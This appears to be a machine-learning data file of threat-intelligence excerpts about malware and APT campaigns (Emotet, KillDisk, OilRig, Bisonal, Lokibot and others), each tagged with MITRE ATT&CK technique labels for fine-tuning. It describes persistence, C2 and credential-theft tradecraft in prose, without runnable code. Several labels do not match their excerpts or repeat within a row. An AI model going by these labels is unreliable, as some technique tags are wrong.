944The payload is a 32-bit executable file that is used to encrypt files on the victim’s system to extort a ransom['T1083 - File and Directory Discovery']fine_tune
945SpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times['T1053.003 - Scheduled Task/Job: Cron']fine_tune
946In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region['T1561.002 - Disk Structure Wipe']fine_tune
947To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, “oc_clear_mem” deletes the string memory right after it retrieves the process address['T1106 - Native API']fine_tune
948The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002['T1027 - Obfuscated Files or Information']fine_tune
949They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools['T1021.004 - Remote Services: SSH']fine_tune
950Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system['T1110.002 - Brute Force: Password Cracking']fine_tune
951The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The “AJWrDz.exe” executable path is written to the registry Run key “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” to achieve persistency['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
952KillDisk’s infection chain . How is it dropped in the system? This KillDisk variant looks like it is intentionally dropped by another process/attacker. The new KillDisk variant’s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn’t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk? It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine['T1134 - Access Token Manipulation']fine_tune
953Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about "Operation Bitter Biscuit" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors['T1082 - System Information Discovery']fine_tune
954NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk['T1552.001 - Unsecured Credentials: Credentials In Files']fine_tune
955The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
956The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore; all the communications are performed with WinInet. The malware connects to the C2 server by using InternetOpenA() with a hardcoded User-Agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011['T1095 - Non-Application Layer Protocol']fine_tune
957We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information['T1102.001 - Dead Drop Resolver']fine_tune
958When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
959Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased['T1012 - Query Registry']fine_tune
960SchTasks.exe performs operations similar to those in Scheduled Tasks in Control Panel. You can use either tool to create, delete, configure, or display scheduled tasks. The user must be a member of the Administrators group on the computer that the command affects. To verify that a scheduled task ran or to find out why a scheduled task did not run, see the Task Scheduler service transaction log, Systemroot\SchedLgU.txt. This log records attempted runs initiated by all tools that use the service, including Scheduled Tasks and SchTasks.exe. On rare occasions, task files become corrupted. Corrupted tasks do not run. When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message: ERROR: The data is invalid. You cannot recover corrupted tasks. To restore the task scheduling features of the system, use SchTasks.exe or Scheduled Tasks to delete the tasks from the system and reschedule them['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
961The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year earlier, in January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six-minute time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time['T1566.002 - Phishing: Spearphishing Link']fine_tune
962SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current user's Run registry key['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
963The third campaign deployed a different custom RPC backdoor from the one used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system['T1016 - System Network Configuration Discovery', 'T1570 - Lateral Tool Transfer']fine_tune
964Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
965The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit['T1027 - Obfuscated Files or Information']fine_tune
966This script is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate). The same can be found in Pony 1.9 code['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
967Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file['T1204.002 - User Execution: Malicious File', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1564.004 - Hide Artifacts: NTFS File Attributes']fine_tune
968An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them['T1553.002 - Code Signing']fine_tune
969In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern['T1105 - Ingress Tool Transfer']fine_tune
970The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
971Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g['T1036.004 - Masquerading: Masquerade Task or Service', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.004 - Masquerading: Masquerade Task or Service']fine_tune
972The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020['T1204.002 - User Execution: Malicious File']fine_tune
973The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account['T1569.002 - System Services: Service Execution']fine_tune
974It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research['T1016 - System Network Configuration Discovery']fine_tune
975The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda['T1588.002 - Tool', 'T1027 - Obfuscated Files or Information', 'T1046 - Network Service Discovery']fine_tune
976It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019['T1071.004 - Application Layer Protocol: DNS']fine_tune
977Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites['T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File']fine_tune
978This is used to maintain access to a Meterpreter session. It is saved to C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8['T1102.002 - Bidirectional Communication']fine_tune
979REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution['T1041 - Exfiltration Over C2 Channel']fine_tune
980It will then jump to code that decrypts the Lokibot executable using decryption keys from the configuration structure. The first two layers are decrypted using `DecryptionKeyA` and `DecryptionKeyB`, and all the data is reversed. After that, the final layer is decrypted using the same decryption method used to decrypt resource data at the start of the third stage. The DLL contains multiple ways to execute a PE file. The shellcode will create a suspended process using the third parameter as a command line command and inject Lokibot into it using process hollowing['T1055.012 - Process Injection: Process Hollowing']fine_tune
981DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories['T1082 - System Information Discovery']fine_tune
982Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point['T1609 - Kubernetes Exec Into Container']fine_tune
9831) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients['T1552.001 - Unsecured Credentials: Credentials In Files']fine_tune
984Collect information about each disk, including directory and file lists, disk names, total space, and remaining space['T1082 - System Information Discovery']fine_tune
985For the first time, the ROKRAT sample used during the "North Korean Human Rights" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample['T1555.004 - Credentials from Password Stores: Windows Credential Manager']fine_tune
986This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request['T1027 - Obfuscated Files or Information']fine_tune
987Cobalt Strike appears to be one of BRONZE PRESIDENT's preferred remote access tools. During one intrusion, the threat actors installed it on over 70% of accessible hosts. The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable. BRONZE PRESIDENT installs PlugX using DLL side-loading. In June and August 2019, BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures. RCSession — This basic RAT is installed via DLL side-loading, and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions. RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process. RCSession connects to its C2 server via a custom protocol, can remotely execute commands, and can launch additional tools. CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool, suggesting it may be exclusively used by BRONZE PRESIDENT. Nbtscan being used via RCSession to scan an internal IP range['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
988Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel['T1027.003 - Steganography']fine_tune
989After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain['T1041 - Exfiltration Over C2 Channel']fine_tune
990CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware['T1486 - Data Encrypted for Impact']fine_tune
991The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command['T1039 - Data from Network Shared Drive', 'T1083 - File and Directory Discovery']fine_tune
992Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time['T1082 - System Information Discovery']fine_tune
993While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416’s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant['T1105 - Ingress Tool Transfer']fine_tune
994uid= and writes a JSS Loader binary to %TEMP%\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files['T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1105 - Ingress Tool Transfer', 'T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
995The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bisonal malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works['T1140 - Deobfuscate/Decode Files or Information']fine_tune
996Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes['T1012 - Query Registry']fine_tune
997TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.001 - Unsecured Credentials: Credentials In Files']fine_tune
998Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity['T1027.003 - Steganography']fine_tune
999Register as a startup program in HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run if it has no privileges (Figure 6). Otherwise, it will register itself as a system service (Figure 7['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
1000The two resources that contain commands that ISMInjector uses for persistence are named “Tsk1” and “Tsk2”. The specific commands within each of these resources are within Table 1. At a high level, the “Tsk1” command creates a scheduled task named “ReportHealth” that is meant to run a payload saved to "%localappdata%\srvHealth.exe” every 4 minutes. The “Tsk2” command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the “certutil” command to decode the original payload saved to “srvBS.txt['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
1001Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter['T1105 - Ingress Tool Transfer']fine_tune
1002PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach['T1203 - Exploitation for Client Execution']fine_tune
1003This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap['T1027 - Obfuscated Files or Information', 'T1106 - Native API']fine_tune
1004APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
1005The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587['T1041 - Exfiltration Over C2 Channel']fine_tune
1006The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process['T1120 - Peripheral Device Discovery']fine_tune
1007It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory['T1027.002 - Obfuscated Files or Information: Software Packing']fine_tune
1008The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipStream class['T1140 - Deobfuscate/Decode Files or Information']fine_tune
1009Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1505.003 - Server Software Component: Web Shell', 'T1105 - Ingress Tool Transfer']fine_tune
1010The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection['T1036.007 - Masquerading: Double File Extension']fine_tune
1011To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing['T1027 - Obfuscated Files or Information']fine_tune
1012While the URI string has changed from Trickbot and Anchor variants, the phishing tactics and use of post-infection reconnaissance commands remains the same. In the Bazar backdoor, the tag (or gtag) used to identify Trickbot campaigns is removed from C2 URIs. It may have been moved to the cookie HTTP header parameter['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
1013Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service – which allows backups to be performed – is stopped['T1490 - Inhibit System Recovery']fine_tune
1014In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up a Registry Run key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
1015As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution['T1112 - Modify Registry']fine_tune
1016The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The "ggldr" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The "entry" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation['T1102.002 - Bidirectional Communication']fine_tune
1017Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page['T1608.001 - Upload Malware']fine_tune
1018The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002['T1588.004 - Digital Certificates']fine_tune
1019These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample['T1102.002 - Bidirectional Communication']fine_tune
1020Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
1021HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
1022The malware proceeds to check to see if the original dropped malware file exists. In the event it does, Reaver will move this file to ‘%TEMP%\~FJIOW.tmp’ and delete this new file. This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine. Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. Reaver continues to collect various information from the victim machine, including the following['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
1023The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California['T1553.002 - Code Signing', 'T1553.002 - Code Signing']fine_tune
1024The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system['T1561.002 - Disk Structure Wipe']fine_tune
1025Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
1026The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
1027Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group['T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
1028Initial access via a phishing email that linked to a Google Docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe['T1566.002 - Phishing: Spearphishing Link']fine_tune
1029Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions['T1102 - Web Service']fine_tune
1030The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts['T1140 - Deobfuscate/Decode Files or Information']fine_tune
1031In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g['T1218.011 - Signed Binary Proxy Execution: Rundll32']fine_tune
1032In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it’s software that’s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
1033Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH['T1059 - Command and Scripting Interpreter', 'T1046 - Network Service Discovery']fine_tune
1034Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060['T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
